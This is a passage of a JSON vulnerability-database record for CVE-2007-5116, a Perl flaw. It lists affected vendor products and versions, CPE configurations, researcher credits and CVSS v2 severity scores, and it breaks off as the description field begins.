            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "ibm",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "ibm",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "larry wall",
            "version": "5.8.4"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "larry wall",
            "version": "5.8.4.2"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "larry wall",
            "version": "5.8.4.2.3"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "larry wall",
            "version": "5.8.0"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "larry wall",
            "version": "5.8.4.3"
          },
          {
            "_id": null,
            "model": "mandrake multi network firewall",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "larry wall",
            "version": "5.8.4.1"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "larry wall",
            "version": "5.8.4.5"
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openpkg",
            "version": "current"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "redhat",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "larry wall",
            "version": "5.8.1"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "larry wall",
            "version": "5.8.4.4"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "larry wall",
            "version": "5.8.6"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "larry wall",
            "version": "5.8.3"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (ws)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (es)"
          },
          {
            "_id": null,
            "model": "mac os x server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.5.1"
          },
          {
            "_id": null,
            "model": "application stack",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "v1 for enterprise linux es (v.4)"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "the perl",
            "version": "5.8.8"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "3.0 (x86-64)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (as)"
          },
          {
            "_id": null,
            "model": "mac os x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.4.11"
          },
          {
            "_id": null,
            "model": "application stack",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "v1 for enterprise linux as (v.4)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (x86)"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0 (x86-64)"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (as)"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "3 (x86-64)"
          },
          {
            "_id": null,
            "model": "perl",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "the perl",
            "version": "version"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (es)"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "3 (x86)"
          },
          {
            "_id": null,
            "model": "mac os x server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.4.11"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5 (server)"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5.0 (client)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (ws)"
          },
          {
            "_id": null,
            "model": "mac os x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.5.1"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (sparc)"
          },
          {
            "_id": null,
            "model": "mandrake linux corporate server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "mandrake linux corporate server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.10"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.10"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.10"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.10"
          },
          {
            "_id": null,
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "8"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10.3"
          },
          {
            "_id": null,
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "unitedlinux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "suse linux standard server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "suse linux school server for i386",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "_id": null,
            "model": "suse linux retail solution",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "suse linux openexchange server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1x86-64"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1x86"
          },
          {
            "_id": null,
            "model": "linux ppc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0x86-64"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0x86"
          },
          {
            "_id": null,
            "model": "linux ppc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "certificate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "application stack for enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "v14"
          },
          {
            "_id": null,
            "model": "application stack for enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "v14"
          },
          {
            "_id": null,
            "model": "advanced workstation for the itanium processor ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "advanced workstation for the itanium processor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "hat fedora",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "7"
          },
          {
            "_id": null,
            "model": "hat enterprise linux desktop client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5"
          },
          {
            "_id": null,
            "model": "hat enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "4"
          },
          {
            "_id": null,
            "model": "hat enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "3"
          },
          {
            "_id": null,
            "model": "hat enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5"
          },
          {
            "_id": null,
            "model": "current",
            "scope": null,
            "trust": 0.3,
            "vendor": "openpkg",
            "version": null
          },
          {
            "_id": null,
            "model": "linux pos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "9"
          },
          {
            "_id": null,
            "model": "linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "9"
          },
          {
            "_id": null,
            "model": "networks self-service peri workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks self-service peri application",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "10000"
          },
          {
            "_id": null,
            "model": "networks self-service ccss7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.1"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.1"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.0"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.0"
          },
          {
            "_id": null,
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.7"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.6"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.5"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.4-5"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.4-4"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.4-3"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.4-2.3"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.4-2"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.4-1"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.4"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.3"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.1"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8.0-88.3"
          },
          {
            "_id": null,
            "model": "wall perl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "larry",
            "version": "5.8"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.20"
          },
          {
            "_id": null,
            "model": "tru64 b-4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "tru64 b-3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "internet express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.7"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "_id": null,
            "model": "linux foresight linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "foresight",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux ppc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ses",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "message networking mn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "intuity audix lx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "interactive response",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.1"
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.3"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.1"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.21"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "26350"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-104"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000796"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-5116"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:ibm:aix",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:perl:perl",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:apple:mac_os_x",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:apple:mac_os_x_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:misc:miraclelinux_asianux_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:redhat:rhel_application_stack",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux_desktop",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000796"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Tavis Ormandy taviso@gentoo.org Will Drewry wad@google.com",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-104"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2007-5116",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2007-5116",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-28478",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2007-5116",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2007-5116",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200711-104",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-28478",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-28478"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-104"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000796"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-5116"
          }
        ]
      },
      "description": {
        "_id": null,
